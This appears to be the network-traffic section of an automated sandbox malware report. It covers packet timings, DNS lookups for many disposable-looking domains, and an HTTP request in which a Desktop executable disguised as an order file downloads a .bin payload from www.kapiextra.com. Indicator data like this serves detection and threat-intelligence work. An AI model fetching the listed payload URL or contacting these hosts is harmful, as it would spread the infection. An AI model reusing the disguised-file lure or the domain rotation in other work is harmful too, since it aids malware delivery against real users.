                                                                                  Aug 27, 2024 17:51:15.351061106 CEST804987235.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:15.351291895 CEST4987280192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:51:15.359217882 CEST4987280192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:51:15.456886053 CEST804987235.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:15.513927937 CEST804987235.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:15.514127970 CEST804987235.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:15.514251947 CEST4987280192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:51:16.862509966 CEST4987280192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:51:17.880096912 CEST4987380192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:51:17.977677107 CEST804987335.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:17.977837086 CEST4987380192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:51:17.985713005 CEST4987380192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:51:18.083244085 CEST804987335.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:18.154844046 CEST804987335.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:18.155132055 CEST804987335.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:18.155260086 CEST4987380192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:51:19.486963034 CEST4987380192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:51:20.504591942 CEST4987480192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:51:20.602349043 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.602484941 CEST4987480192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:51:20.611572027 CEST4987480192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:51:20.611654043 CEST4987480192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:51:20.709553003 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.709661961 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.709672928 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.709783077 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.709794998 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.709819078 CEST4987480192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:51:20.709904909 CEST4987480192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:51:20.709908009 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.709916115 CEST4987480192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:51:20.710025072 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.710110903 CEST4987480192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:51:20.710171938 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.710184097 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.710247040 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.710278034 CEST4987480192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:51:20.710448980 CEST4987480192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:51:20.710597038 CEST4987480192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:51:20.780950069 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.807699919 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.807809114 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.807820082 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.807827950 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.807861090 CEST4987480192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:51:20.807951927 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.808011055 CEST4987480192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:51:20.808024883 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.808034897 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.808152914 CEST4987480192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:51:20.808193922 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.808203936 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.808264971 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.808274031 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.808283091 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.808321953 CEST4987480192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:51:20.808418036 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.808579922 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.808592081 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.808599949 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.808609009 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.808617115 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.808763981 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.808773041 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.906505108 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.906517029 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.906538963 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.906702995 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.906861067 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.906893015 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.906903028 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.906912088 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.907031059 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.907041073 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.980765104 CEST804987435.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:20.980918884 CEST4987480192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:51:22.126967907 CEST4987480192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:51:23.144576073 CEST4987580192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:51:23.242312908 CEST804987535.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:23.242456913 CEST4987580192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:51:23.247764111 CEST4987580192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:51:23.345460892 CEST804987535.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:23.416874886 CEST804987535.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:23.417133093 CEST804987535.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:23.417319059 CEST4987580192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:51:23.419152021 CEST4987580192.168.11.2035.244.245.121
                                                                                  Aug 27, 2024 17:51:23.516880035 CEST804987535.244.245.121192.168.11.20
                                                                                  Aug 27, 2024 17:51:28.424738884 CEST4987680192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:51:28.646039963 CEST804987685.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:51:28.646302938 CEST4987680192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:51:28.654114008 CEST4987680192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:51:28.877273083 CEST804987685.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:51:28.877507925 CEST4987680192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:51:30.156486988 CEST4987680192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:51:31.174395084 CEST4987780192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:51:31.396022081 CEST804987785.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:51:31.396178007 CEST4987780192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:51:31.404109001 CEST4987780192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:51:31.627439976 CEST804987785.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:51:31.627646923 CEST4987780192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:51:32.905865908 CEST4987780192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:51:33.923530102 CEST4987880192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:51:34.145247936 CEST804987885.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:51:34.145482063 CEST4987880192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:51:34.154535055 CEST4987880192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:51:34.154570103 CEST4987880192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:51:34.154643059 CEST4987880192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:51:34.376339912 CEST804987885.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:51:34.376450062 CEST804987885.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:51:34.376461983 CEST804987885.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:51:34.376523018 CEST4987880192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:51:34.376602888 CEST4987880192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:51:34.376667976 CEST4987880192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:51:34.376686096 CEST804987885.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:51:34.376808882 CEST4987880192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:51:34.376879930 CEST804987885.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:51:34.376976013 CEST4987880192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:51:34.377126932 CEST4987880192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:51:34.377317905 CEST4987880192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:51:34.598155975 CEST804987885.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:51:34.598252058 CEST804987885.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:51:34.598386049 CEST4987880192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:51:34.598402023 CEST804987885.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:51:34.598469973 CEST4987880192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:51:34.598536968 CEST804987885.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:51:34.598741055 CEST804987885.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:51:34.598814011 CEST4987880192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:51:34.598891020 CEST804987885.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:51:34.599076033 CEST804987885.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:51:34.599149942 CEST4987880192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:51:34.599463940 CEST804987885.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:51:34.599531889 CEST804987885.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:51:34.599704027 CEST804987885.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:51:34.599925041 CEST804987885.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:51:34.600032091 CEST804987885.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:51:34.820056915 CEST804987885.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:51:34.820115089 CEST804987885.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:51:34.820125103 CEST804987885.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:51:34.820292950 CEST804987885.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:51:34.820522070 CEST804987885.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:51:34.820657015 CEST804987885.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:51:34.820774078 CEST804987885.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:51:34.820920944 CEST804987885.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:51:34.822670937 CEST804987885.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:51:34.822834015 CEST4987880192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:51:35.670850992 CEST4987880192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:51:36.688932896 CEST4987980192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:51:36.910762072 CEST804987985.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:51:36.911088943 CEST4987980192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:51:36.916383982 CEST4987980192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:51:37.140204906 CEST804987985.159.66.93192.168.11.20
                                                                                  Aug 27, 2024 17:51:37.140533924 CEST4987980192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:51:37.142570019 CEST4987980192.168.11.2085.159.66.93
                                                                                  Aug 27, 2024 17:51:37.365986109 CEST804987985.159.66.93192.168.11.20
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Aug 27, 2024 17:45:51.777331114 CEST5820253192.168.11.201.1.1.1
                                                                                  Aug 27, 2024 17:45:52.039859056 CEST53582021.1.1.1192.168.11.20
                                                                                  Aug 27, 2024 17:46:24.873090029 CEST5752253192.168.11.201.1.1.1
                                                                                  Aug 27, 2024 17:46:25.003926039 CEST53575221.1.1.1192.168.11.20
                                                                                  Aug 27, 2024 17:46:30.023849964 CEST6466553192.168.11.201.1.1.1
                                                                                  Aug 27, 2024 17:46:30.145087957 CEST53646651.1.1.1192.168.11.20
                                                                                  Aug 27, 2024 17:46:50.814579010 CEST5544753192.168.11.201.1.1.1
                                                                                  Aug 27, 2024 17:46:51.003585100 CEST53554471.1.1.1192.168.11.20
                                                                                  Aug 27, 2024 17:47:04.139748096 CEST6357253192.168.11.201.1.1.1
                                                                                  Aug 27, 2024 17:47:04.327847004 CEST53635721.1.1.1192.168.11.20
                                                                                  Aug 27, 2024 17:47:17.980643988 CEST6115853192.168.11.201.1.1.1
                                                                                  Aug 27, 2024 17:47:18.353394032 CEST53611581.1.1.1192.168.11.20
                                                                                  Aug 27, 2024 17:47:32.539767981 CEST6101953192.168.11.201.1.1.1
                                                                                  Aug 27, 2024 17:47:32.644426107 CEST53610191.1.1.1192.168.11.20
                                                                                  Aug 27, 2024 17:47:40.694173098 CEST6213953192.168.11.201.1.1.1
                                                                                  Aug 27, 2024 17:47:41.170564890 CEST53621391.1.1.1192.168.11.20
                                                                                  Aug 27, 2024 17:47:54.925298929 CEST6122653192.168.11.201.1.1.1
                                                                                  Aug 27, 2024 17:47:55.699464083 CEST53612261.1.1.1192.168.11.20
                                                                                  Aug 27, 2024 17:48:08.906502962 CEST6112753192.168.11.201.1.1.1
                                                                                  Aug 27, 2024 17:48:09.445700884 CEST53611271.1.1.1192.168.11.20
                                                                                  Aug 27, 2024 17:48:23.200782061 CEST5562853192.168.11.201.1.1.1
                                                                                  Aug 27, 2024 17:48:23.311579943 CEST53556281.1.1.1192.168.11.20
                                                                                  Aug 27, 2024 17:48:31.370712042 CEST5502753192.168.11.201.1.1.1
                                                                                  Aug 27, 2024 17:48:31.488964081 CEST53550271.1.1.1192.168.11.20
                                                                                  Aug 27, 2024 17:48:44.633192062 CEST5111753192.168.11.201.1.1.1
                                                                                  Aug 27, 2024 17:48:44.861443996 CEST53511171.1.1.1192.168.11.20
                                                                                  Aug 27, 2024 17:48:59.145433903 CEST5950753192.168.11.201.1.1.1
                                                                                  Aug 27, 2024 17:49:00.158369064 CEST5950753192.168.11.209.9.9.9
                                                                                  Aug 27, 2024 17:49:00.360462904 CEST53595071.1.1.1192.168.11.20
                                                                                  Aug 27, 2024 17:49:02.086211920 CEST53595079.9.9.9192.168.11.20
                                                                                  Aug 27, 2024 17:49:14.220205069 CEST5381253192.168.11.201.1.1.1
                                                                                  Aug 27, 2024 17:49:14.326690912 CEST53538121.1.1.1192.168.11.20
                                                                                  Aug 27, 2024 17:49:22.390321016 CEST5533053192.168.11.201.1.1.1
                                                                                  Aug 27, 2024 17:49:22.507564068 CEST53553301.1.1.1192.168.11.20
                                                                                  Aug 27, 2024 17:49:35.637736082 CEST5109953192.168.11.201.1.1.1
                                                                                  Aug 27, 2024 17:49:35.747150898 CEST53510991.1.1.1192.168.11.20
                                                                                  Aug 27, 2024 17:49:51.961005926 CEST5444953192.168.11.201.1.1.1
                                                                                  Aug 27, 2024 17:49:52.083937883 CEST53544491.1.1.1192.168.11.20
                                                                                  Aug 27, 2024 17:50:52.277272940 CEST6384753192.168.11.201.1.1.1
                                                                                  Aug 27, 2024 17:50:52.416961908 CEST53638471.1.1.1192.168.11.20
                                                                                  Aug 27, 2024 17:51:42.154908895 CEST6040153192.168.11.201.1.1.1
                                                                                  Aug 27, 2024 17:51:42.263725042 CEST53604011.1.1.1192.168.11.20
                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Aug 27, 2024 17:45:51.777331114 CEST192.168.11.201.1.1.10x636bStandard query (0)www.kapiextra.comA (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:46:24.873090029 CEST192.168.11.201.1.1.10x9b1bStandard query (0)www.ayna-pro.shopA (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:46:30.023849964 CEST192.168.11.201.1.1.10x1f91Standard query (0)www.23ddv.topA (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:46:50.814579010 CEST192.168.11.201.1.1.10x7f74Standard query (0)www.gyver.cloudA (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:47:04.139748096 CEST192.168.11.201.1.1.10x583eStandard query (0)www.vlyra.onlineA (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:47:17.980643988 CEST192.168.11.201.1.1.10xa4feStandard query (0)www.tyai36.topA (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:47:32.539767981 CEST192.168.11.201.1.1.10xd04Standard query (0)www.950021.comA (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:47:40.694173098 CEST192.168.11.201.1.1.10x2e83Standard query (0)www.indeks.spaceA (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:47:54.925298929 CEST192.168.11.201.1.1.10x7144Standard query (0)www.kiristyle.shopA (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:48:08.906502962 CEST192.168.11.201.1.1.10x21Standard query (0)www.tmglift.xyzA (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:48:23.200782061 CEST192.168.11.201.1.1.10x7eb6Standard query (0)www.esistiliya.onlineA (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:48:31.370712042 CEST192.168.11.201.1.1.10x6e24Standard query (0)www.theaji.shopA (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:48:44.633192062 CEST192.168.11.201.1.1.10xb1e9Standard query (0)www.bola88site.oneA (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:48:59.145433903 CEST192.168.11.201.1.1.10x49bbStandard query (0)www.policydetails.onlineA (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:49:00.158369064 CEST192.168.11.209.9.9.90x49bbStandard query (0)www.policydetails.onlineA (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:49:14.220205069 CEST192.168.11.201.1.1.10xe2faStandard query (0)www.terrearcenciel.onlineA (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:49:22.390321016 CEST192.168.11.201.1.1.10xc418Standard query (0)www.at8l4.shopA (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:49:35.637736082 CEST192.168.11.201.1.1.10xd608Standard query (0)www.dom-2.onlineA (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:49:51.961005926 CEST192.168.11.201.1.1.10xc13cStandard query (0)www.ayna-pro.shopA (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:50:52.277272940 CEST192.168.11.201.1.1.10x84bdStandard query (0)www.950021.comA (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:51:42.154908895 CEST192.168.11.201.1.1.10x844eStandard query (0)www.esistiliya.onlineA (IP address)IN (0x0001)false
                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Aug 27, 2024 17:45:52.039859056 CEST1.1.1.1192.168.11.200x636bNo error (0)www.kapiextra.comkapiextra.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Aug 27, 2024 17:45:52.039859056 CEST1.1.1.1192.168.11.200x636bNo error (0)kapiextra.com23.111.141.202A (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:46:25.003926039 CEST1.1.1.1192.168.11.200x9b1bName error (3)www.ayna-pro.shopnonenoneA (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:46:30.145087957 CEST1.1.1.1192.168.11.200x1f91No error (0)www.23ddv.top23ddv.topCNAME (Canonical name)IN (0x0001)false
                                                                                  Aug 27, 2024 17:46:30.145087957 CEST1.1.1.1192.168.11.200x1f91No error (0)23ddv.top154.23.184.218A (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:46:51.003585100 CEST1.1.1.1192.168.11.200x7f74No error (0)www.gyver.cloudgyver.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                  Aug 27, 2024 17:46:51.003585100 CEST1.1.1.1192.168.11.200x7f74No error (0)gyver.cloud76.223.67.189A (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:46:51.003585100 CEST1.1.1.1192.168.11.200x7f74No error (0)gyver.cloud13.248.213.45A (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:47:04.327847004 CEST1.1.1.1192.168.11.200x583eNo error (0)www.vlyra.online203.161.42.73A (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:47:18.353394032 CEST1.1.1.1192.168.11.200xa4feNo error (0)www.tyai36.toptyai36.topCNAME (Canonical name)IN (0x0001)false
                                                                                  Aug 27, 2024 17:47:18.353394032 CEST1.1.1.1192.168.11.200xa4feNo error (0)tyai36.top38.47.207.120A (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:47:32.644426107 CEST1.1.1.1192.168.11.200xd04Name error (3)www.950021.comnonenoneA (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:47:41.170564890 CEST1.1.1.1192.168.11.200x2e83No error (0)www.indeks.space194.58.112.174A (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:47:55.699464083 CEST1.1.1.1192.168.11.200x7144No error (0)www.kiristyle.shopshops.vipshopbuy.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Aug 27, 2024 17:47:55.699464083 CEST1.1.1.1192.168.11.200x7144No error (0)shops.vipshopbuy.com35.244.245.121A (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:48:09.445700884 CEST1.1.1.1192.168.11.200x21No error (0)www.tmglift.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Aug 27, 2024 17:48:09.445700884 CEST1.1.1.1192.168.11.200x21No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Aug 27, 2024 17:48:09.445700884 CEST1.1.1.1192.168.11.200x21No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:48:23.311579943 CEST1.1.1.1192.168.11.200x7eb6Name error (3)www.esistiliya.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:48:31.488964081 CEST1.1.1.1192.168.11.200x6e24No error (0)www.theaji.shop3.82.56.39A (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:48:31.488964081 CEST1.1.1.1192.168.11.200x6e24No error (0)www.theaji.shop18.204.16.85A (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:48:44.861443996 CEST1.1.1.1192.168.11.200xb1e9No error (0)www.bola88site.onebola88site.oneCNAME (Canonical name)IN (0x0001)false
                                                                                  Aug 27, 2024 17:48:44.861443996 CEST1.1.1.1192.168.11.200xb1e9No error (0)bola88site.one172.96.191.39A (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:49:00.360462904 CEST1.1.1.1192.168.11.200x49bbNo error (0)www.policydetails.onlinepolicydetails.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                  Aug 27, 2024 17:49:00.360462904 CEST1.1.1.1192.168.11.200x49bbNo error (0)policydetails.online148.135.49.178A (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:49:02.086211920 CEST9.9.9.9192.168.11.200x49bbNo error (0)www.policydetails.onlinepolicydetails.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                  Aug 27, 2024 17:49:02.086211920 CEST9.9.9.9192.168.11.200x49bbNo error (0)policydetails.online148.135.49.178A (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:49:14.326690912 CEST1.1.1.1192.168.11.200xe2faName error (3)www.terrearcenciel.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:49:22.507564068 CEST1.1.1.1192.168.11.200xc418No error (0)www.at8l4.shopat8l4.shopCNAME (Canonical name)IN (0x0001)false
                                                                                  Aug 27, 2024 17:49:22.507564068 CEST1.1.1.1192.168.11.200xc418No error (0)at8l4.shop3.33.130.190A (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:49:22.507564068 CEST1.1.1.1192.168.11.200xc418No error (0)at8l4.shop15.197.148.33A (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:49:35.747150898 CEST1.1.1.1192.168.11.200xd608No error (0)www.dom-2.online199.59.243.226A (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:49:52.083937883 CEST1.1.1.1192.168.11.200xc13cName error (3)www.ayna-pro.shopnonenoneA (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:50:52.416961908 CEST1.1.1.1192.168.11.200x84bdName error (3)www.950021.comnonenoneA (IP address)IN (0x0001)false
                                                                                  Aug 27, 2024 17:51:42.263725042 CEST1.1.1.1192.168.11.200x844eName error (3)www.esistiliya.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                  • www.kapiextra.com
                                                                                  • www.23ddv.top
                                                                                  • www.gyver.cloud
                                                                                  • www.vlyra.online
                                                                                  • www.tyai36.top
                                                                                  • www.indeks.space
                                                                                  • www.kiristyle.shop
                                                                                  • www.tmglift.xyz
                                                                                  • www.theaji.shop
                                                                                  • www.bola88site.one
                                                                                  • www.policydetails.online
                                                                                  • www.at8l4.shop
                                                                                  • www.dom-2.online
                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.11.204980623.111.141.202806688C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:45:52.183060884 CEST180OUTGET /wRdZDseACWW137.bin HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                  Host: www.kapiextra.com
                                                                                  Cache-Control: no-cache
                                                                                  Aug 27, 2024 17:45:52.320461988 CEST1289INHTTP/1.1 200 OK
                                                                                  Date: Tue, 27 Aug 2024 15:45:52 GMT
                                                                                  Server: Apache
                                                                                  Last-Modified: Tue, 27 Aug 2024 01:43:10 GMT
                                                                                  Accept-Ranges: bytes
                                                                                  Content-Length: 288832
                                                                                  Content-Type: application/octet-stream
